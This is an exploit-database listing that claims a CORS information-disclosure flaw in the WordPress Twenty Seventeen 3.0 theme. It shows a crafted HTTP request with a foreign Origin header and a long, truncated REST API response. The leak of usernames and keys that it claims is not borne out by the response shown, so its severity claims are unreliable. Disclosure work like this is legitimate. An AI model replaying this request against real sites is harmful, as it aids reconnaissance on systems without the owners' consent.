[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress Twenty Seventeen 3.0 Cross-origin resource sharing information Vulnerability

Author
nu11secur1ty
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-37946
Category
web applications
Date add
08-09-2022
Platform
php
## Title: WordPress 6.0.2 - THEME - Twenty Seventeen: 3.0- CORS-Vulnerability 
## Author: nu11secur1ty
## Vendor: https://wordpress.org/
## Software: Twenty SeventeenVersion: 3.0
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Twenty-Seventeen-3.0


## Description:
The theme Twenty Seventeen-3.0 is vulnerable to CORS - Cross-origin resource sharing information.
The attacker can get very sensitive information from the system a.k.a username, key authentication, phone numbers some library information and etc. 
By using this information the attacker can organize other more dangerous attacks against the system and he can apply serious damage.

STATUS: Medium - HIGH

[+] Payload REQUEST:

```
GET /wordpress/wp-json/ HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="105", "Chromium";v="105"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Origin: http://pwnedhost1.com/

```

[+]Payload RESPONSE:

```
HTTP/1.1 200 OK
Date: Wed, 07 Sep 2022 11:08:52 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
X-Powered-By: PHP/8.1.6
X-Robots-Tag: noindex
Link: <http://pwnedhost.com/wordpress/wp-json/>; rel="https://api.w.org/"
X-Content-Type-Options: nosniff
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link
Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type
Allow: GET
Access-Control-Allow-Origin: http://pwnedhost1.com/
Access-Control-Allow-Methods: OPTIONS, GET, POST, PUT, PATCH, DELETE
Access-Control-Allow-Credentials: true
Vary: Origin
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 161249

{"name":"nu11secur1ty","description":"Just another WordPress site","url":"http:\/\/pwnedhost.com\/wordpress","home":"http:\/\/pwnedhost.com\/wordpress","gmt_offset":"0","timezone_string":"","namespaces":["oembed\/1.0","wp\/v2","wp-site-health\/v1","wp-block-editor\/v1"],"authentication":[],"routes":{"\/":{"namespace":"","methods":["GET"],"endpoints":[{"methods":["GET"],"args":{"context":{"default":"view","required":false}}}],"_links":{"self":[{"href":"http:\/\/pwnedhost.com\/wordpress\/wp-json\/"}]}},"\/batch\/v1":{"namespace":"","methods":["POST"],"endpoints":[{"methods":["POST"],"args":{"validation":{"type":"string","enum":["require-all-validate","normal"],"default":"normal","required":false},"requests":{"type":"array","maxItems":25,"items":{"type":"object","properties":{"method":{"type":"string","enum":["POST","PUT","PATCH","DELETE"],"default":"POST"},"path":{"type":"string","required":true},"body":{"type":"object","properties":[],"additionalProperties":true},"headers":{"type":"object","properties":[],"additionalProperties":{"type":["string","array"],"items":{"type":"string"}}}}},"required":true}}}],"_links":{"self":[{"href":"http:\/\/pwnedhost.com\/wordpress\/wp-json\/batch\/v1"}]}},"\/oembed\/1.0":{"namespace":"oembed\/1.0","methods":["GET"],"endpoints":[{"methods":["GET"],"args":{"namespace":{"default":"oembed\/1.0","required":false},"context":{"default":"view","required":false}}}],"_links":{"self":[{"href":"http:\/\/pwnedhost.com\/wordpress\/wp-json\/oembed\/1.0"}]}},"\/oembed\/1.0\/embed":{"namespace":"oembed\/1.0","methods":["GET"],"endpoints":[{"methods":["GET"],"args":{"url":{"description":"The URL of the resource for which to fetch oEmbed data.","type":"string","format":"uri","required":true},"format":{"default":"json","required":false},"maxwidth":{"default":600,"required":false}}}],"_links":{"self":[{"href":"http:\/\/pwnedhost.com\/wordpress\/wp-json\/oembed\/1.0\/embed"}]}},"\/oembed\/1.0\/proxy":{"namespace":"oembed\/1.0","methods":["GET"],"endpoints":[{"methods":["GET"],"args":{"url":{"description":"The URL of the resource for which to fetch oEmbed data.","type":"string","format":"uri","required":true},"format":{"description":"The oEmbed format to use.","type":"string","default":"json","enum":["json","xml"],"required":false},"maxwidth":{"description":"The maximum width of the embed frame in pixels.","type":"integer","default":600,"required":false},"maxheight":{"description":"The maximum height of the embed frame in pixels.","type":"integer","required":false},"discover":{"description":"Whether to perform an oEmbed discovery request for unsanctioned providers.","type":"boolean","default":true,"required":false}}}],"_links":{"self":[{"href":"http:\/\/pwnedhost.com\/wordpress\/wp-json\/oembed\/1.0\/proxy"}]}},"\/wp\/v2":{"namespace":"wp\/v2","methods":["GET"],"endpoints":[{"methods":["GET"],"args":{"namespace":{"default":"wp\/v2","required":false},"context":{"default":"view","required":false}}}],"_links":{"self":[{"href":"http:\/\/pwnedhost.com\/wordpress\/wp-json\/wp\/v2"}]}},"\/wp\/v2\/posts":{"namespace":"wp\/v2","methods":["GET","POST"],"endpoints":[{"methods":["GET"],"allow_batch":{"v1":true},"args":{"context":{"description":"Scope under which the request is made; determines fields present in response.","type":"string","enum":["view","embed","edit"],"default":"view","required":false},"page":{"description":"Current page of the collection.","type":"integer","default":1,"minimum":1,"required":false},"per_page":{"description":"Maximum number of items to be returned in result set.","type":"integer","default":10,"minimum":1,"maximum":100,"required":false},"search":{"description":"Limit results to those matching a string.","type":"string","required":false},"after":{"description":"Limit response to posts published after a given ISO8601 compliant date.","type":"string","format":"date-time","required":false},"modified_after":{"description":"Limit response to posts modified after a given ISO8601 compliant date.","type":"string","format":"date-time","required":false},"author":{"description":"Limit result set to posts assigned to specific authors.","type":"array","items":{"type":"integer"},"default":[],"required":false},"author_exclude":{"description":"Ensure result set excludes posts assigned to specific authors.","type":"array","items":{"type":"integer"},"default":[],"required":false},"before":{"description":"Limit response to posts published before a given ISO8601 compliant date.","type":"string","format":"date-time","required":false},"modified_before":{"description":"Limit response to posts modified before a given ISO8601 compliant date.","type":"string","format":"date-time","required":false},"exclude":{"description":"Ensure result set excludes specific IDs.","type":"array","items":{"type":"integer"},"default":[],"required":false},"include":{"description":"Limit result set to specific IDs.","type":"array","items":{"type":"integer"},"default":[],"required":false},"offset":{"description":"Offset the result set by a specific number of items.","type":"integer","required":false},"order":{"description":"Order sort attribute ascending or descending.","type":"string","default":"desc","enum":["asc","desc"],"required":false},"orderby":{"description":"Sort collection by post attribute.","type":"string","default":"date","enum":["author","date","id","include","modified","parent","relevance","slug","include_slugs","title"],"required":false},"slug":{"description":"Limit result set to posts with one or more specific slugs.","type":"array","items":{"type":"string"},"required":false},"status":{"default":"publish","description":"Limit result set to posts assigned one or more statuses.","type":"array","items":{"enum":["publish","future","draft","pending","private","trash","auto-draft","inherit","request-pending","request-confirmed","request-failed","request-completed","any"],"type":"string"},"required":false},"tax_relation":{"description":"Limit result set based on relationship between multiple taxonomies.","type":"string","enum":["AND","OR"],"required":false},"categories":{"description":"Limit result set to items with specific terms
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Twenty-Seventeen-3.0)

## Proof and Exploit:
[href](https://streamable.com/5bohx4)

#  0day.today [2024-03-28]  #